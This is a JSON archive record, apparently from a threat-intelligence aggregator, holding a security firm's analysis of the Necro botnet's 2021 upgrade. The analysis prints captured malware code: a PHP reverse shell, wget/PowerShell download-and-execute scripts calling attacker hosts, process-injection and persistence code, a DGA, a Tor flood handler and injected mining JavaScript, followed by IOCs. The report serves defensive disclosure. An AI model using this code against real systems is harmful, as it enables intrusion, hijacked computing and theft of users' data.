{
	"id": "2f871e6c-06f1-4ee6-9efd-6330d78d072c",
	"created_at": "2026-04-06T00:22:01.938729Z",
	"updated_at": "2026-04-10T03:35:29.096295Z",
	"deleted_at": null,
	"sha1_hash": "c904724212b3f975ba64fb2d07dcee87c20e4360",
	"title": "Necro upgrades again, using Tor + dynamic domain DGA and aiming at both Windows \u0026 Linux",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 420030,
	"plain_text": "Necro upgrades again, using Tor + dynamic domain DGA and\r\naiming at both Windows \u0026 Linux\r\nBy jinye\r\nPublished: 2021-03-18 · Archived: 2026-04-02 10:55:54 UTC\r\nOverview\r\nBack in January, we blogged about a new botnet Necro and shortly after our report, it stopped spreading. On\r\nMarch 2nd, we noticed a new variant of Necro showing up on our BotMon tracking radar March 2nd, the BotMon\r\nsystem has detected that Necro has started spreading again, in addition to the previous TerraMaster RCE\r\n(CVE_2020_35665) and Zend RCE (CVE-2021-3007), two newer vulnerabilities Laravel RCE (CVE-2021-3129)\r\nand WebLogic RCE ( CVE-2020-14882) have been added, the following graphic shows the trend.\r\nWe found that after a month of silence the new version of Necro has been significantly changed and further\r\nenhanced, the following is a summary:\r\n1. Start to attack Windws system and use Rootkit to hide itself on Windows platform.\r\n2. \"subdomain DGA + dynamic domain name\" are being used to generate C2 domains\r\n3. C2 communication support Tor, and a Tor-based DDoS attacks has been added.\r\n4. It propagates Gafgyt_tor against specific Linux targets.\r\n5. 
It tampers with the web service page on the victim machine to perform browser mining, as well as stealing\r\nuser data, turning the user's browser into a DDoS bot, and hash cracking.\r\nWe mentioned earlier this month that Gafgyt_tor and Necro are released by the same group, the so-called Keksec; the\r\nfunctions of this new Necro are shown below.\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 1 of 12\n\nIt is worth noting that we have seen two samples of the new version: one uses Tor for C2 and one generates C2 by\r\nusing \"subdomain DGA + dynamic domain\".\r\nSample Analysis\r\nScanning and propagation\r\nLaravel RCE (CVE-2021-3129)\r\nThe exploit of this vulnerability uses a reverse shell to first download a bash script, as shown in the following\r\nfigure.\r\nZCgAMCXTa='php -r \\'$sock=fsockopen(\"'+self.YxqCRypO+'\",9999);$proc=proc_open(\"/bin/sh -i\", array(0=\u003e$sock, 1=\u003e\r\n ZCgAMCXTa=ZCgAMCXTa.replace('/', '\\/')\r\nThe downloaded bash script functions as follows.\r\n1. Download and execute another script, malware.sh.\r\n2. Download and execute Gafgyt_tor.\r\n3. Download and execute the mining program.\r\nHere is a bash script we captured.\r\nwget http://kek.gay/malware.sh -O malware.sh\r\nsh malware.sh\r\nrm -f malware.sh\r\ncd /tmp || cd /home/$USER || cd /var/run || cd $(busybox find / -writable -readable -executable | head -n 1) ||\r\nwget http://45.145.185.83/S1eJ3/IObeENwjx64 -O IObeENwjx64; busybox wget http://45.145.185.83/S1eJ3/IObeENwjx64\r\n...\r\nexport ARGS=\"-o 45.145.185.83:9050\"\r\nexport LINE=\"[ ! 
-f /tmp/.apid ] \u0026\u0026 echo \u003e /tmp/.apid;./.1/sshd $ARGS \u003e\u003e /dev/null;./.2/sshd $ARGS \u003e\u003e /dev/null\r\necho \"$LINE\" \u003e ./.backup.sh\r\ncurl http://45.145.185.83/xmrig1 -O\r\nwget http://45.145.185.83/xmrig1 -O xmrig1\r\nmkdir ./.1;mv -f xmrig1 ./.1/sshd\r\n...\r\nchmod +x ./.backup.sh;\r\nsh ./.backup.sh \u0026\r\nexit\r\nOne of the malware.sh scripts is used to download and execute a new version of Necro, as shown below.\r\n#pkill -9 python\r\nwget http://45.144.225.96/benchmark.py -O benchmark.py\r\npython benchmark.py || python2 benchmark.py || python2.7 benchmark.py || /usr/bin/python benchmark.py || /usr/bi\r\nWebLogic RCE (CVE-2020-14882)\r\nThe vulnerability has two exploits, one for Linux and one for Windows.\r\nThe exploit for Linux uses bash, which downloads and executes both Necro (setup.py) and the mining program.\r\ncd /tmp||cd $(find / -writable -readable -executable | head -n 1);php -r \"file_put_contents(\\\\\".setup\\\\\", file_\r\nThe Windows exploit uses PowerShell, which first downloads the packaged Python 2.7 executable (py.exe), then\r\ndownloads and executes Necro (setup.py).\r\n\"@powershell -NoProfile -ExecutionPolicy unrestricted -Command \\\"(New-Object System.Net.WebClient).DownloadFile\r\nAttacking Windows systems\r\nFrom the above analysis, we can see that some WebLogic servers are running on Windows, and the KekSec\r\ngroup is obviously interested in these hosts as well. 
After the sample is started, if the underlying operating system\r\nis detected as Windows, then py.exe will be copied to USERPROFILE\\\\$6829.exe; the code is shown in the\r\nfollowing figure.\r\nif os.name == 'nt':\r\n try:\r\n sys.argv[1]\r\n except IndexError:\r\n subprocess.Popen(GetCommandLine() + \" 1\", creationflags=8, close_fds=True)\r\n os.kill(os.getpid(),9)\r\n ehVfvaRFGMNE = CreateMutex(None, False, ehVfvaRFGMNE)\r\n if GetLastError() == ERROR_ALREADY_EXISTS:\r\n os.kill(os.getpid(),9)\r\n if os.path.abspath(sys.argv[0]).lower().endswith('.exe') and not os.path.abspath(sys.argv[0]).lower().endswi\r\n try:\r\n shutil.copyfile(os.path.abspath(sys.argv[0]), os.getenv('USERPROFILE') + '\\\\$6829.exe')\r\n os.startfile(os.getenv('USERPROFILE') + '\\\\$6829.exe')\r\n os.kill(os.getpid(),9)\r\n except:\r\n pass\r\n else:\r\nNecro will then download a file named x86.dll or x64.dll depending on the platform architecture:\r\n try:\r\n shutil.copyfile(sys.executable, os.getenv('USERPROFILE') + '\\\\$6829.exe')\r\n except:\r\n pass\r\n try:\r\n if platform.architecture()[0].replace(\"bit\",\"\") == \"32\":\r\n eZazkoBSoXlO=ahFxoRRhxXE(urllib2.urlopen('http://' + RaRdhjkniVY + '/x86.dll').read())\r\n else:\r\n eZazkoBSoXlO=ahFxoRRhxXE(urllib2.urlopen('http://' + RaRdhjkniVY + '/x64.dll').read())\r\n threading.Thread(target=oFHPQFcppV, args=(eZazkoBSoXlO,)).start()\r\n except:\r\n pass\r\nThis DLL file corresponds to the open-source rootkit project r77-rootkit, which according to the project description\r\ncan fully hide specific processes:\r\nr77 is a ring 3 Rootkit that hides following entities from all processes:\r\nFiles, directories, named pipes, scheduled tasks\r\nProcesses\r\nCPU usage\r\nRegistry keys \u0026 
values\r\nTCP \u0026 UDP connections\r\nIt is compatible with Windows 7 and Windows 10 in both x64 and x86 editions.\r\nNecro then loads the rootkit via process injection, using shellcode taken from another open-source\r\nproject, sRDI, as shown below.\r\n # pack rootkit and shellcode\r\n ...\r\n gwObVdGd += struct.pack('b', ObianOdA - len(gwObVdGd) - 4)\r\n gwObVdGd += b'\\x00\\x00\\x00'\r\n gwObVdGd += b'\\x48\\x89\\xf4'\r\n gwObVdGd += b'\\x5e'\r\n gwObVdGd += b'\\xc3'\r\n if len(gwObVdGd) != ObianOdA:\r\n raise Exception('x64 bootstrap length: {} != bootstrapSize: {}'.format(len(gwObVdGd), ObianOdA))\r\n return gwObVdGd + dXQHuOmhsG + FVgoLCUS + fzWaJzyWo\r\n else:\r\n ...\r\n gwObVdGd += struct.pack('b', ObianOdA - len(gwObVdGd) - 4) # Skip over the remainder of instructions\r\n gwObVdGd += b'\\x00\\x00\\x00'\r\n gwObVdGd += b'\\x83\\xc4\\x14'\r\n gwObVdGd += b'\\xc9'\r\n gwObVdGd += b'\\xc3'\r\n if len(gwObVdGd) != ObianOdA:\r\n raise Exception('x86 bootstrap length: {} != bootstrapSize: {}'.format(len(gwObVdGd), ObianOdA))\r\n return gwObVdGd + dXQHuOmhsG + FVgoLCUS + fzWaJzyW\r\n \r\n # inject process\r\n FfyiMaCpdR = windll.kernel32.OpenProcess(0x1F0FFF, False, UjyuiVGyhiD)\r\n if not FfyiMaCpdR:\r\n cJaQhosf -= 1\r\n return\r\n llvOMLUBC = windll.kernel32.VirtualAllocEx(FfyiMaCpdR, 0, len(eZazkoBSoXlO), 0x00001000, 0x40)\r\n windll.kernel32.WriteProcessMemory(FfyiMaCpdR, llvOMLUBC, eZazkoBSoXlO, len(eZazkoBSoXlO), 0)\r\n if not windll.kernel32.CreateRemoteThread(FfyiMaCpdR, None, 0, llvOMLUBC, 0, 0, 0):\r\nFinally, Necro registers itself for persistence under HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run:\r\n if os.name == 'nt':\r\n try:\r\n aReg = ConnectRegistry(None,HKEY_CURRENT_USER)\r\n aKey = OpenKey(aReg, r\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\", 0, KEY_WRITE)\r\n 
SetValueEx(aKey,'System explore',0, REG_SZ, os.getenv('USERPROFILE') + '\\\\$6829.exe ' + os.path.\r\n windll.kernel32.SetFileAttributesW(os.getenv('USERPROFILE') + '\\\\$6829.exe', FILE_ATTRIBUTE_HIDD\r\n except:\r\n pass\r\nUsing Tor communication\r\nSince we have seen the KekSec group using Tor to hide the real C2 in Gafgyt_tor, we are not surprised that the\r\nnew version of Necro supports Tor. What surprised us is that Necro actually integrates a Tor proxy-based DDoS\r\nattack method.\r\nThe Tor C2 communication code is as follows, and you can see the IPs and ports of multiple Tor proxies\r\nintegrated in it.\r\ntry:\r\n import socks\r\nexcept:\r\n f=open('socks.py', \"w\")\r\n f.write(urllib2.urlopen('https://raw.githubusercontent.com/mikedougherty/SocksiPy/master/socks.py').read())\r\n f.close()\r\n try:\r\n import socks\r\n except:\r\n exit(1)\r\n try:\r\n os.remove('socks.py')\r\n os.remove('socks.pyc')\r\n except:\r\n pass\r\nserver_list = ['192.248.190.123:8017', '192.248.190.123:8001', '88.198.82.11:9051', '52.3.115.71:9050', '185.117\r\n...\r\nself.onionserver='faw623ska5evipvarobhpzu4ntoru5v6ia5444krr6deerdnvpa3p7ad.onion'\r\nself.AJEwioE='#freakyonionz'\r\nself.Ajiowfe='FUCKWHITEHATZ'\r\n...\r\nThe code of the newly added DDoS attack method torflood is as follows.\r\n elif CjoRjhoMj[3]==\":\" + self.cmdprefix + 'torflood':\r\n try:\r\n import socks\r\n except:\r\n ...\r\n self.commSock.send('PRIVMSG %s :Unable to initilize socks module.\\n' % (MZqyBxdoS))\r\n for i in range(0, int(CjoRjhoMj[7])):\r\n threading.Thread(target=self.XoReERalPae,args=(CjoRjhoMj[4],CjoRjhoMj[5],int(CjoRjhoMj[6]),)\r\n self.commSock.send('PRIVMSG %s :Started Tor HTTP flood on URL: %s with %s threads\\n' % 
(MZqyBxdo\r\nSub-domain DGA + dynamic domain name\r\nThe new version of Necro updated the DGA mechanism: it uses the DGA to generate subdomains and then combines them with\r\ndynamic domain names to form the final C2 domain name. From the code we can see that there are 30 dynamic\r\ndomain name service providers.\r\nzMuBHdcdB=0\r\nwhile zMuBHdcdB \u003c 0xcc:\r\n zMuBHdcdB+=1\r\n random.seed(a=0x7774DEAD + zMuBHdcdB)\r\n RaRdhjkniVY=(''.join(random.choice('abcdefghijklmnopqoasadihcouvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') f\r\n RaRdhjkniVY+=\".\"+random.choice(['ddns.net','ddnsking.com','3utilities.com','bounceme.net','freedynamicdns.ne\r\n print RaRdhjkniVY\r\nNine domains are live now, and from the resolution records some domains use IPv6 addresses.\r\n2021-03-09 10:50:50 2021-03-12 16:10:45 ntxkg0la99w.zapto.org\r\n2021-03-12 08:19:49 2021-03-12 08:19:49 xxdqj6xbjpkzhk7k.servemp3.com\r\n2021-03-12 10:35:11 2021-03-12 10:35:11 qb7opowcawiagia.viewdns.net\r\n2021-03-12 08:46:28 2021-03-12 08:46:28 v5jke3mv89fjvxgd.serveftp.com\r\n2021-03-12 14:59:54 2021-03-12 14:59:54 nwpzhm8ziyhdzm.redirectme.net\r\n2021-03-12 03:12:07 2021-03-12 03:12:07 m1afommgsdowkmegc.redirectme.net\r\n2021-03-12 04:56:47 2021-03-12 04:56:47 ewmhkvdcoj3.servemp3.com\r\n2021-03-12 08:38:17 2021-03-12 08:38:17 tfcxvcg0lkc9vpx.myftp.org\r\n2021-03-12 06:48:19 2021-03-12 06:48:19 bdcauhuzk0d.viewdns.net\r\nJS code embedding\r\nThe main purpose of Necro's JS code embedding is to inject mining code into the victim’s web pages.\r\nelif CjoRjhoMj[3]==\":\" + self.cmdprefix + 'injectcount':\r\n self.commSock.send('PRIVMSG %s :I have injected into %s files total\\n' % (MZqyBxdoS, self.AkvElneS))\r\nelif CjoRjhoMj[3]==\":\" + self.cmdprefix + 'reinject':\r\n threading.Thread(target=self.OLkEqimhli).start()\r\n self.commSock.send('PRIVMSG %s :Re-injecting all html and js files\\n' % (MZqyBxdoS))\r\nNecro will first traverse the '*.js', '*.html', '*.htm', '*.php' files in the specified directories of the 
infected\r\ndevice to find the target of injection.\r\nif os.name != \"nt\":\r\n self.AkvElneS=0\r\n for fkEoBpoAxpZc in [ele for ele in os.listdir(\"/\") if ele not in ['proc', \"bin\", 'sbin', 'sbin', \"dev\", \"li\r\n for hfHpWZSupopK in ['*.js', '*.html', '*.htm', '*.php']:\r\n for oGADwYHVg in os.popen(\"find \\\"/\" + fkEoBpoAxpZc + \"\\\" -type f -name \\\"\" + hfHpWZSupopK + \"\\\"\").r\r\n oGADwYHVg = oGADwYHVg.replace(\"\\r\", \"\").replace(\"\\n\", \"\")\r\n if 'node' not in oGADwYHVg and 'lib' not in oGADwYHVg and \"npm\" not in oGADwYHVg and oGADwYHVg !\r\n self.chLYewdc(oGADwYHVg)\r\nOnce the target is found, Necro inserts a piece of code into the file.\r\nMnPbIqasMz=open(oGADwYHVg,\"rb\")\r\n mkkzygnopRnB=MnPbIqasMz.read()\r\n MnPbIqasMz.close()\r\n fPSqTAZGgcep = kdYaxMPRdP(8)\r\n OGipqKBSmmTb = kdYaxMPRdP(8)\r\n hgOlaeQcQza = b64encode(\"//\" + self.injectCOxhTEJfB + '/campaign.js')\r\n fwEiSidxlgH='(function(' + OGipqKBSmmTb + \", \" + fPSqTAZGgcep + \") {\" + fPSqTAZGgcep + \" = \" + OGipq\r\n ...\r\n else:\r\n if oGADwYHVg.endswith(\".js\"):\r\n if 'var ' in mkkzygnopRnB:\r\n mkkzygnopRnB=self.kRChazSiN(mkkzygnopRnB, 'var ', fwEiSidxlgH + 'var ', 1)\r\n self.AkvElneS+=1\r\n wQARXUaaF = True\r\n else:\r\n if '\u003c/body' in mkkzygnopRnB:\r\n mkkzygnopRnB=self.kRChazSiN(mkkzygnopRnB, '\u003c/body', '\u003cscript type=' + '\"' + 'text/javasc\r\n self.AkvElneS+=1\r\n wQARXUaaF = True\r\n if wQARXUaaF:\r\n MnPbIqasMz=open(oGADwYHVg, \"wb\")\r\nThe infected page will have the following additional code.\r\n(function(v2, v1) {\r\n v1 = v2.createElement('script');\r\n v1.type = 'text/javascript';\r\n v1.async = true;\r\n v1.src = atob('UUIDLy91YmxvY2stcmVmZXJlci5kZXYvY2FtcGFpZ24uanM=UUID'.replace(/UUID/gi, '')) + '?' 
+ String(M\r\n v2.getElementsByTagName('body')[0].appendChild(v1);\r\n}(document));\r\nThis small piece of code loads a script from hxxp[:]//ublock-referer.dev/campaign.js. Through our\r\nWebInsight system we can see that 300+ websites have been infected by Necro in the last week.\r\ncampaign.js is highly obfuscated JavaScript code with a detection rate of 0 on VT.\r\nThe code uses two layers of obfuscation and has three main functions.\r\nMining\r\nWhen an end user visits the victim’s website, the browser will load a mining JS script: hxxps[:]//cloud-miner.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.xmr2\r\nUser data stealing\r\nThe code monitors 4 events (unload/beforeunload/popstate/pagehide) and then reports the data through the\r\nfollowing two interfaces:\r\nInterface | Function\r\n/l.php | upload keyboard records\r\n/f.php | upload form data\r\nExecute instruction\r\nWhen end users access the victim’s website, the malicious JS will be loaded, and ublock-referer.dev/api.ph will\r\nbe called to perform various functions and send back some of the users’ data. A brief breakdown of the functions:\r\nCommand | Function | Interface\r\ncookie | Send back cookies | /c.php\r\nclipboard | Send back clipboard content | /cb.php\r\nview | Use an iframe to load any URL |\r\npost | Send a POST request to a target |\r\nfloodpost | DDoS a target with periodic POST requests |\r\nload | Periodically add Image objects that request the specified resources, to DDoS a target |\r\nantiddos | Periodically add iframes, appending random strings of digits to the target link, to DDoS a target |\r\nlayer4 | Periodically send POST requests with random content of a specified length range to the target (DDoS) |\r\njack | Load the specified content by creating an iframe; can be used to fake or hijack a web page |\r\neval | Execute arbitrary code via the eval method |\r\nmd5/sha1 | Perform collision attacks against MD5 with the specified length range and code table, and report back when it succeeds | /h.php\r\nThe corresponding C2 is still hxxp[:]//ublock-referer.dev/, switching between http/https according to the\r\nprotocol of the compromised site:\r\nmaster = window[\"location\"][\"protocol\"] + \"//ublock-referer.dev\";\r\nAPIKey = \"callbackScript\";\r\nThe URL hxxps[:]//ublock-referer.dev is also used to download the malicious Firefox plug-in\r\nublock_referer-1.0.0-an+fx.xpi; the plug-in uses the above-mentioned JavaScript bot Cloud9.\r\nCode obfuscation algorithm\r\nThis new version of Necro abandoned the original simple variable-name replacement algorithm and implemented\r\na code morphing algorithm based on the abstract syntax tree (AST), which achieves complete randomization of\r\nobject names and higher code coverage of the obfuscation, with the result that the new Necro sample has a VT\r\ndetection rate of 0.\r\ndDojPSRD=open(ULTiBINyz,\"rb\")\r\n ...\r\n p = ast.parse(CFiLMBZFoL)\r\n MiaFfQWZhb().visit(p)\r\n for caSZxzOdnbhJ in sorted(mdSaCUFhqM, key=len, reverse=True):\r\n ...\r\n EqDdlmuEhx = [node.name for node in ast.walk(p) if isinstance(node, ast.ClassDef)]\r\n joPNpGTbcn = sorted({node.id for node in ast.walk(p) if isinstance(node, ast.Name) and not isinstance(node.\r\n for mFVUeqoHs in [n for n in p.body if isinstance(n, ast.FunctionDef)]:\r\n aPpaAZnhc.append(mFVUeqoHs.name)\r\n EqDdlmuEhx = [node for node in ast.walk(p) if isinstance(node, ast.ClassDef)]\r\n for ubhohFYJDo in EqDdlmuEhx:\r\n for mFVUeqoHs in [n for n in ubhohFYJDo.body if isinstance(n, ast.FunctionDef)]:\r\n if mFVUeqoHs.name != '__init__' and 
mFVUeqoHs not in aPpaAZnhc:\r\n aPpaAZnhc.append(mFVUeqoHs.name)\r\n ...\r\n hkaxeZCocag=open(ULTiBINyz,\"wb\")\r\nSummary\r\nSince Necro was discovered, we have been continuously following and tracking this botnet, associated it with\r\nthe KekSec group behind it, and discovered more of their activities attacking Linux devices. We will continue to\r\nkeep an eye on Necro and will disclose any new findings.\r\nIOC\r\nTor C2\r\nfaw623ska5evipvarobhpzu4ntoru5v6ia5444krr6deerdnvpa3p7ad.onion\r\nDownload URL\r\nhttp://ntxkg0la99w.zapto.org/setup.py\r\nhttp://kek.gay/benchmark.py\r\nhttp://kek.gay/x86.dll\r\nhttp://kek.gay/x64.dll\r\nhttp://kek.gay/xmrig1.py\r\nhttp://kek.gay/xmrig1\r\nhttp://kek.gay/py.exe\r\nJS Miner/Bot Related\r\nhttps://cloud-miner.de/*\r\nhttps://ublock-referer.dev/*\r\nTor Proxy\r\nReaders are always welcome to reach us on Twitter, or by email at netlabat 360dot cn\r\nSource: https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/"
	],
	"report_names": [
		"necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux"
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5a270f6c-2c13-4abf-861e-7d44dcfa5ceb",
			"created_at": "2023-11-03T02:00:07.794425Z",
			"updated_at": "2026-04-10T02:00:03.383096Z",
			"deleted_at": null,
			"main_name": "Keksec",
			"aliases": [],
			"source_name": "MISPGALAXY:Keksec",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434921,
	"ts_updated_at": 1775792129,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c904724212b3f975ba64fb2d07dcee87c20e4360.pdf",
		"text": "https://archive.orkl.eu/c904724212b3f975ba64fb2d07dcee87c20e4360.txt",
		"img": "https://archive.orkl.eu/c904724212b3f975ba64fb2d07dcee87c20e4360.jpg"
	}
}